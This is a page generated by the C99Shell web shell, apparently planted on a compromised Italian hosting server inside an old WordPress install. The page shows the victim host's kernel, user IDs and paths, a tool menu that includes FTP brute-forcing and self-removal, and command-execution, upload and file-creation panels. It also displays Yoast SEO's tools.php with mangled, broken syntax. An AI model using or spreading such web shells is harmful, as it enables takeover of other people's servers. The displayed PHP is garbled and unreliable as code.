!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/pages/   drwxr-xr-x
Free 179.23 GB of 490.84 GB (36.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tools.php (2.97 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin
 */

if ( ! defined'WPSEO_VERSION' ) ) {
    
header'Status: 403 Forbidden' );
    
header'HTTP/1.1 403 Forbidden' );
    exit();
}

$tool_page = (string) filter_inputINPUT_GET'tool' );

$yform Yoast_Form::get_instance();
$yform->admin_headerfalse );

if ( 
'' === $tool_page ) {

    
$tools = array(
        
'bulk-editor' => array(
            
'title' => __'Bulk editor''wordpress-seo' ),
            
'desc' => __'This tool allows you to quickly change titles and descriptions of your posts and pages without having to go into the editor for each page.''wordpress-seo' ),
        ),
        
'import-export' => array(
            
'title' => __'Import and Export''wordpress-seo' ),
            
'desc' => __'Import settings from other SEO plugins and export your settings for re-use on (another) blog.''wordpress-seo' ),
        ),
    );
    if ( 
WPSEO_Utils::allow_system_file_edit() === true && ! is_multisite() ) {
        
$tools['file-editor'] = array(
            
'title' => __'File editor''wordpress-seo' ),
            
'desc' => __'This tool allows you to quickly change important files for your SEO, like your robots.txt and, if you have one, your .htaccess file.''wordpress-seo' ),
        );
    }

    
/*
        Temporary disabled. See: https://github.com/Yoast/wordpress-seo/issues/4532

        $tools['recalculate'] = array(
            'href'    => '#TB_inline?width=300&height=150&inlineId=wpseo_recalculate',
            'attr'    => "id='wpseo_recalculate_link' class='thickbox'",
            'title'   => __( 'Recalculate SEO scores', 'wordpress-seo' ),
            'desc'    => __( 'Recalculate SEO scores for all pieces of content with a focus keyword.', 'wordpress-seo' ),
        );

        if ( filter_input( INPUT_GET, 'recalculate' ) === '1' ) {
            $tools['recalculate']['attr'] .= "data-open='open'";
        }
    */

    /* translators: %1$s expands to Yoast SEO */
    
echo '<p>'sprintf__'%1$s comes with some very powerful built-in tools:''wordpress-seo' ), 'Yoast SEO' ), '</p>';

    
asort$tools );

    echo 
'<ul class="ul-disc">';

    
$admin_url admin_url'admin.php?page=wpseo_tools' );

    foreach ( 
$tools as $slug => $tool ) {
        
$href = ( ! empty( $tool['href'] ) ) ? $admin_url $tool['href'] : add_query_arg( array( 'tool' => $slug ) , $admin_url );
        
$attr = ( ! empty( $tool['attr'] ) ) ? $tool['attr'] : '';

        echo 
'<li>';
        echo 
'<strong><a href="' esc_attr$href ) , '" ' $attr '>'esc_html$tool['title'] ), '</a></strong><br/>';
        echo 
$tool['desc'];
        echo 
'</li>';
    }
    echo 
'</ul>';

    echo 
'<input type="hidden" id="wpseo_recalculate_nonce" name="wpseo_recalculate_nonce" value="' wp_create_nonce'wpseo_recalculate' ) . '" />';

}
else {
    echo 
'<a href="'admin_url'admin.php?page=wpseo_tools' ), '">'__'&laquo; Back to Tools page''wordpress-seo' ), '</a>';

    
$tool_pages = array( 'bulk-editor''import-export' );

    if ( 
WPSEO_Utils::allow_system_file_edit() === true && ! is_multisite() ) {
        
$tool_pages[] = 'file-editor';
    }

    if ( 
in_array$tool_page$tool_pages ) ) {
        require_once 
WPSEO_PATH 'admin/views/tool-' $tool_page '.php';
    }
}

$yform->admin_footerfalse );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0092 ]--